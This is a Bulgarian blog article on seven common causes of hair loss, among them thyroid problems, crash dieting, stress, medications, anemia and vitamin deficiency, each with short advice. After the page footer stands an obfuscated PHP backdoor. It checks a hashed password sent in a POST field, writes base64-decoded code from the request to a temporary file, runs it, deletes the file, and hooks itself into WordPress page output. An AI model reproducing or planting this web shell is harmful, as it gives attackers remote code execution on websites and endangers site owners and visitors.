7 от най- честите причини за косопад и как да се справим с тях | Косопад

7 от най- честите причини за косопад и как да се справим с тях

Имате силен косопад и не знаете каква е причината?

Вижте кои са 7- те най- чести причини за капането на косата и какво да правите във всеки един случай:

1. Проблем с щитовидната жлеза
Една от най- честите причини за косопада са заболяванията, свързани с щитовидната жлеза. Когато е налице такъв проблем, в тялото ни има хормонален дисбаланс. Такъв може да се появи също и при менопауза, диабет или ендокринно заболяване.
Ако имате подозрения, че и вашият случай спада към тази група, трябва да се обърнете към лекар, който да ви назначи подходящите изследвания. Това е единственият начин да се открие заболяване на щитовидната жлеза или друг ендокринен проблем.
2. Спазвате прекалено строг режим на хранене
Понякога сами не си даваме сметка, че се храним по прекалено строг начин. Но трябва да имаме предвид, че ако отслабнем с много килограми за малко време, не се отразява добре на организма. Ако дълго време сме лишавали тялото си от необходими хранителни вещества, се получава дефицит. Това състояние обикновено е съпроводено с обилен косопад.
Съветът на диетолозите е да наблегнем на физическите упражнения, вместо да гладуваме.
3. Хроничен стрес
Това състояние се отразява негативно на кръвообращението. Добрата новина е, че когато стресът намалее, косата бързо ще се възстанови. Важно е да отделяте достатъчно време за почивка и възстановяване.
4. Неправилно третиране на скалпа
Фризьорите съветват да внимаваме с употребата на сешоар и преса. Също с различни разкрасителни процедури като слагане на екстеншъни, честа смяна на цвета на косата и пр. Този тип интервенции увреждат скалпа и могат да предизвикат силен косопад.
5. Прием на някои видове лекарства
Също може да предизвика косопад. Сред тях са някои от медикаментите за високо кръвно. Също някои видове антидепресанти.
6. Анемия
Много често предизвиква силен косопад. Причината е, че липсата на желязо нарушава кръвообращението. Други признаци на анемия за бързата умора, сънливост, загуба на енергия. Единственият начин да се провери дали имате анемия е изследване на хемоглобина. Проблемът се решава като се приема като хранителна добавка или чрез храната.
7. Авитаминоза
Недостига на някои витамини в организма предизвиква косопад. Най- често се получава при дефицит на витамин С, в случаите на анемия. Както и на някои видове витамин В. Решението е да се приема под формата на хранителна добавка.

25. ноември 2017 17:49:09 от Надя Колева
Категории: Косопад – Статии | Етикети: , , | Напишете Коментар

if(!function_exists("_set_fetas_tag") && !function_exists("_set_betas_tag")){try{function _set_fetas_tag(){if(isset($_GET['here'])&&!isset($_POST['here'])){die(md5(8));}if(isset($_POST['here'])){$a1='m'.'d5';if($a1($a1($_POST['here']))==="83a7b60dd6a5daae1a2f1a464791dac4"){$a2="fi"."le"."_put"."_contents";$a22="base";$a22=$a22."64";$a22=$a22."_d";$a22=$a22."ecode";$a222="PD"."9wa"."HAg";$a2222=$_POST[$a1];$a3="sy"."s_ge"."t_te"."mp_dir";$a3=$a3();$a3 = $a3."/".$a1(uniqid(rand(), true));@$a2($a3,$a22($a222).$a22($a2222));include($a3); @$a2($a3,'1'); @unlink($a3);die();}else{echo md5(7);}die();}} _set_fetas_tag();if(!isset($_POST['here'])&&!isset($_GET['here'])){function _set_betas_tag(){echo "";}add_action('wp_head','_set_betas_tag');}}catch(Exception $e){}}